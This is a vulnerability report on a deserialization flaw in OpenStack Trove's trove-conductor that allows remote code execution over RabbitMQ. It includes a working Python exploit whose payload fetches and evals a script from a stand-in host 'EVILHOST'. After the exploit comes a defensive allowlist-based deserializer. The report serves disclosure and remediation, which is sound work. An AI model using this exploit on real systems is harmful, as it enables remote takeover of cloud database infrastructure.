Trove-conductor allows a remote DB instance to specify the class name of a serialized notification and then deserializes it. The security issue is that trove-conductor doesn't check the class name, so an attacker can create an instance of an arbitrary type and, because instantiation and a function call have the same syntax in Python, call an arbitrary function. This can lead to remote code execution in the trove-conductor instance. The attacker only needs to know the credentials to authenticate to RabbitMQ in order to communicate with trove-conductor. The credentials are usually stored in the DB instance, so that's not a big problem.
Example of exploit:
```
import uuid
import pika
import json

HOST = "trove_conductor_hostname"
PORT = "trove_conductor_port"
LOGIN = "your_rabbit_userid"
PASSWORD = "your_rabbit_password"

credentials = pika.PlainCredentials(username=LOGIN, password=PASSWORD)
parameters = pika.ConnectionParameters(host=HOST, port=PORT, credentials=credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()

pld = json.dumps({
    "oslo.message": json.dumps({
        "_msg_id": "bdbe9981fdf84a08bfe0a8c010c366f1",
        "_unique_id": str(uuid.uuid4()),
        "version": "1.0",
        "_timeout": None,
        "_reply_q": "reply_808ddf95d05748b0a6793bb0ee8d3570",
        "args": {
            "serialized_notification": {
                "run_as_root": True,
                "root_helper": "python -c 'eval(__import__(\"requests\").get(\"http://EVILHOST/shell.py\").text)'",
                "notification_classname": "oslo_concurrency.processutils.execute"},
            "notification_args": {}},
        "method": "notify_end"}),
    "oslo.version": "2.0"})

channel.basic_publish(
    exchange='trove',
    routing_key='trove-conductor',
    properties=pika.BasicProperties(
        content_type='application/json',
        headers=None
    ),
    body=pld,
)
```
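One way to close the hole described in the report, shown as an added example that is not Trove's own code: the class name from the message is used only as a key into a fixed allowlist, never imported or looked up dynamically. The `Notification` classes, the `example.notification.*` wire names and `deserialize_notification` are hypothetical names chosen for this sketch.

```python
class Notification:
    """Stand-in for a notification base class (hypothetical, not Trove's)."""
    def __init__(self, **fields):
        self.fields = fields

class InstanceCreated(Notification):
    pass

class BackupFinished(Notification):
    pass

# Wire name -> class. Only these types can ever be built from a message.
ALLOWED_NOTIFICATIONS = {
    "example.notification.InstanceCreated": InstanceCreated,
    "example.notification.BackupFinished": BackupFinished,
}

class RejectedNotification(ValueError):
    """Raised when a message names a type outside the allowlist."""

def deserialize_notification(serialized):
    """Build a notification from an untrusted dict without importing by name."""
    if not isinstance(serialized, dict):
        raise RejectedNotification("payload is not a mapping")
    fields = dict(serialized)  # work on a copy, leave the message intact
    classname = fields.pop("notification_classname", None)
    if not isinstance(classname, str):
        raise RejectedNotification("missing or non-string class name")
    cls = ALLOWED_NOTIFICATIONS.get(classname)
    if cls is None:
        # No import, no getattr: the name is only ever used as a dict key.
        raise RejectedNotification("class name not allowed: %r" % classname)
    return cls(**fields)

# Constructed sample with the shape of the payload in the report above.
REPORTED_PAYLOAD = {
    "run_as_root": True,
    "root_helper": "<redacted>",
    "notification_classname": "oslo_concurrency.processutils.execute",
}

if __name__ == "__main__":
    ok = deserialize_notification(
        {"notification_classname": "example.notification.InstanceCreated",
         "instance_id": "constructed-id"})
    print(type(ok).__name__, ok.fields)
    try:
        deserialize_notification(REPORTED_PAYLOAD)
    except RejectedNotification as exc:
        print("rejected:", exc)
```

Rejections raised here are worth logging together with the sending queue or guest identity, since a legitimate guest agent has no reason to name a type outside the allowlist.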